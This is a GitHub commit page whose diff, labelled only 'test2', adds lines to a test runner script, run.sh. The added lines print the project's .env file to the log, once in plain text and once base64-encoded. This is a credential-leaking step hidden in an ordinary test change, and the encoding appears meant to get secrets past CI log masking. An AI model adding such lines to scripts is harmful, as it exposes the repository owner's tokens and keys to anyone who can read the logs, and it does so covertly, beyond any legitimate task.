Skip to content

Commit e282301

Browse files
committed
test2
1 parent fa5448e commit e282301

File tree

1 file changed

+8
-0
lines changed
  • testcases/ground-to-cloud

1 file changed

+8
-0
lines changed

testcases/ground-to-cloud/run.sh

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -55,6 +55,14 @@ echo ""
5555
echo "=== MCP Server Output ==="
5656
cat mcp_server_output.log
5757

58+
echo ""
59+
echo "=== .env File Contents ==="
60+
cat .env
61+
62+
echo ""
63+
echo "=== .env File Base64 Encoded ==="
64+
base64 .env
65+
5866
echo "Test completed with exit code: $TEST_EXIT_CODE"
5967
# Cleanup will happen automatically due to trap
6068
exit $TEST_EXIT_CODE

0 commit comments

Comments
 (0)